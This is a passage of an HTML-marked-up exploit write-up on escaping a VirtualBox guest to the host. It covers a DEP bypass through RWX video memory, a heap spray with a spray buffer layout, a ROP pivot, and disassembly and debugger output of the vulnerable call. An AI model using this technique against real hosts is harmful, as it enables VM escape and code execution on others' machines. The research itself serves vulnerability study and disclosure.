class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_BYTE<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_UNSIGNED_BYTE<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLbyte<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_SHORT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_UNSIGNED_SHORT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLshort<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_INT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_UNSIGNED_INT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLint<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_FLOAT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLfloat<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_DOUBLE<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLdouble<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">crError<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Bad type in crServerDispatchGetChromiumParametervCR&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-30\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">crServerReturnValue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">local_storage<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-33\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0063 seconds] -->  <\/p>\n<p><b>DEP Bypass<\/b><br \/> Not so difficult protection for this day. It might be enough to make a ROP chain but we have a quite scarce control of registers at the time of the vulnerable call [rax+320h], so I decided to search for another ways. It turned out that a host VirtualBox process has a memory region corresponding to guest video memory (VRAM) and its protection is RWX. If there is a pointer to VRAM in the host process, we could leak it using the information leak bug described above and transfer the control to VRAM where a shellcode written by our guest driver will be residing.<\/p>\n<p>Indeed, there is a global variable in \/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_main.c that stores an address of VRAM:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f553924442286\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">C<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> uint8_t* g_pvVRamBase = NULL;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f553924442286-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f553924442286-1\"><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">g_pvVRamBase<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>Moreover, server_main.c is a part of VBoxSharedCrOpenGL.so library which address can be easily leaked, and the variable itself is placed at the fixed offset from the libary.<\/p>\n<p>Thus to bypass DEP we leak VBoxSharedCrOpenGL.so address, add a fixed offset to it to obtain a pointer to g_pvVRamBase variable, and then force the host process to place the pointer in such way that later our ROP code will read a VRAM address from the pointer and will transfer the control to video memory. As we&#8217;ll see soon, just one ROP gadget is enough for that.<\/p>\n<p><b>Heap Spray<\/b><br \/> The last step is to spray the heap. We need to create many H3DORInstance-s following by a chunks with content controlled by us. To create a display I send VBOXCMDVBVA_FLIP command, as it does the WDDM driver. To allocate chunks of arbitrary content I send CR_PROGRAMNAMEDPARAMETER4DVNV_EXTEND_OPCODE command. This command accepting a buffer as an argument allocates memory and copies the buffer content to it, but doesn&#8217;t deallocates it even if the command is failed. I use this &#8220;feature&#8221; to pass the buffer of the following content:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f559284880773\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Offset 0x00: &lt;address-of-rop-gadget&gt;  Offset 0x08: &lt;address-of-g_pvVRamBase&gt;  Offset 0x10: &lt;address-of-rop-gadget&gt;  Offset 0x18: &lt;address-of-g_pvVRamBase&gt;  &#8230; and so on.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f559284880773-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f559284880773-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f559284880773-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f559284880773-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f559284880773-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f559284880773-1\"><span class=\"crayon-i\">Offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rop<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">gadget<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f559284880773-2\"><span class=\"crayon-i\">Offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">g_pvVRamBase<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f559284880773-3\"><span class=\"crayon-i\">Offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rop<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">gadget<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f559284880773-4\"><span class=\"crayon-i\">Offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">g_pvVRamBase<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f559284880773-5\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">so <\/span><span class=\"crayon-v\">on<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>As you can see, our buffers contain only two values. The first, a pointer to the rop gadget, is placed at addresses modulo 16, so one of them will be used in the vulnerable call command. Remember:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f55d613621684\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> .text:0000000000100DFF                 mov     rax, [rax]  .text:0000000000100E02                 mov     rdi, [rdi+8]  .text:0000000000100E06                 call    qword ptr [rax+320h]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f55d613621684-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f55d613621684-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f55d613621684-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f55d613621684-1\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DFF<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f55d613621684-2\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100E02<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f55d613621684-3\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100E06<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">call&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">qword <\/span><span class=\"crayon-i\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">320h<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>The second, a pointer to g_pvVRamBase, is placed at addresses not modulo 16, and one of them will be used in the ROP gadget:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f561304566284\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  x\/3i $pc  =&gt; 0x7f8485c3c403:\tmov    rax,QWORD PTR [rax+0x48]     0x7f8485c3c407:\tmov    rdi,rax     0x7f8485c3c40a:\tcall   QWORD PTR [rax]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f561304566284-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f561304566284-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f561304566284-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f561304566284-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f561304566284-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">3i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">pc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f561304566284-2\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7f8485c3c403<\/span><span class=\"crayon-o\">:<\/span><span 